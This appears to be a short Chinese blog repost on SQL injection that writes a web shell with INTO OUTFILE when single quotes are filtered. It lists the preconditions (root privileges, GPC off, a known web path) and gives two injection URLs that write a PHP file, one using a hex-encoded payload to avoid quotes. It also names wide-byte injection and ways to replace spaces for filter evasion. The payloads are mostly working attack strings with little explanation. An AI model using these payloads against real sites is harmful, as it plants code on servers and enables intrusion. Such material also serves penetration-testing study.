当前位置:   article > 正文

SQL注入写shell 单引号被过滤解决思路_sql注入单引号被过滤

sql注入单引号被过滤

shell: root 权限,GPC 关闭,知道文件路径outfile函数

http://127.0.0.1:81/sqli.php?id=1 into outfile C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'

http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile C:\\wamp64\\www\\phpinfo.php'`

 

宽字节注入

代替空格的方法

%0a、%0b、%a0 等/**/ 等注释符<>

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/爱喝兽奶帝天荒/article/detail/738244
推荐阅读
相关标签
  

闽ICP备14008679号